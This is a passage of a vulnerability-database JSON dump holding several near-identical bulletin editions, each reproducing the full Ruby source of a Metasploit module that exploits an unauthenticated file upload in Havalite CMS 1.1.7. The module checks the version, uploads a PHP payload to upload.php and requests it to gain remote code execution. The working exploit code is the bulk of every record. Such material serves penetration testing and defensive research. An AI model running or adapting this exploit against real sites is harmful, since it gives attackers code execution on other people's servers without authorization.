'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-06-30T22:40:27", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-02T03:11:50", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-02T03:11:50", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-02T04:58:41", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-02T04:58:41", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-04T13:12:55", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-04T13:12:55", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-04T15:04:02", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-04T15:04:02", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-09T07:29:07", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-09T07:29:07", "differentElements": ["modified", "published"], "edition": 57}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-09T11:10:02", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n 